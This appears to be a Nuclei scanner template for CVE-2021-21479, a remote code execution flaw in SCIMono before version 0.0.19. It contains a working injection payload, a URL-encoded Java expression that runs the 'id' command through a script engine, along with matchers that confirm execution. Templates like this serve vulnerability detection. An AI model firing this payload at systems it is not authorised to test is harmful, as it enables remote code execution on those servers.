id: CVE-2021-21479 info: name: SCIMono < v0.0.19 Remote Code Execution author: dwisiswant0 severity: critical reference: https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/ description: | In SCIMono before 0.0.19, it is possible for an attacker to inject and execute java expression compromising the availability and integrity of the system. tags: cve,cve2021,scimono,rce requests: - method: GET path: - "{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D" matchers: - type: word words: - "The attribute value" - "java.lang.UNIXProcess@" - "has invalid value!" - '"status" : "400"' part: body condition: and